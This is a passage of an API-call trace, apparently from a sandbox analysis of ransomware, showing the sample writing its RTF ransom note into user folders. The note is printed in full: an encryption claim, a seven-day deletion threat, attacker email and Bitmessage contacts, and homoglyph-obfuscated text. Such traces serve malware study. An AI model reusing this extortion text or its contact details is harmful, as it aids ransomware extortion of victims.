lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.179] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.179] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.179] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.182] CloseHandle (hObject=0x2ec) returned 1 [0291.182] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\#readme_eman#.rtf")) returned 0xffffffff [0291.182] GetLastError () returned 0x2 [0291.182] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.182] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 